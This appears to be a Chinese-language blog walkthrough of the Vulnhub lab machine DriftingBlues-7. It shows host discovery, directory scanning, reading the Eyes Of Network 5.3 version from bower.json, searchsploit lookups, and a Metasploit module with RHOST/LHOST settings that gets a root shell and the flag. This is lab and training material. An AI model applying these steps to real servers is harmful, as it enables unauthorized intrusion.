当前位置:网站首页>看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7

看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7

2022-06-25 10:16:00 落寞的魚丶

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/
在这里插入图片描述
在这里插入图片描述
下载好了把安装包解压 然后试用VMware即可。

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.144
在这里插入图片描述
这回开启的端口还挺多的 老样子先看一下80端口页面发现是Eyes Of Network(第一次见)
使用dirsearch扫一下后台 但是没有搜到想要的结果 没有可以用的信息

在这里插入图片描述

这里是看到别人扫到了自己没扫到 也不知道为啥

在这里插入图片描述

访问:https://192.168.205.144/bower.json发现了版本号 为 5.3
在这里插入图片描述
使用kali 搜索一下对应的相关漏洞:searchsploit Eyes Of Network 5.3
在这里插入图片描述

②:漏洞利用:

打开msf 搜索相关关键词Eyes Of Network

在这里插入图片描述

show options   #查看需要设置的参数

在这里插入图片描述

set  RHOST 192.168.205.144
set LHOST 192.168.205.133
run

在这里插入图片描述
进入shell 模式 cd /root 查看flag.txt
在这里插入图片描述

③:查看flag:

在这里插入图片描述
至此获取到了所有得flag,渗透测试结束。

Vulnhub靶机渗透总结:

感觉这个靶机 特别简单没有涉及到提权一些列操作 就是msf的基本使用

DriftingBlues系列的第七个靶机了后继会继续更新,创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

原网站

版权声明
本文为[落寞的魚丶]所创,转载请带上原文链接,感谢
https://blog.csdn.net/Aluxian_/article/details/125356552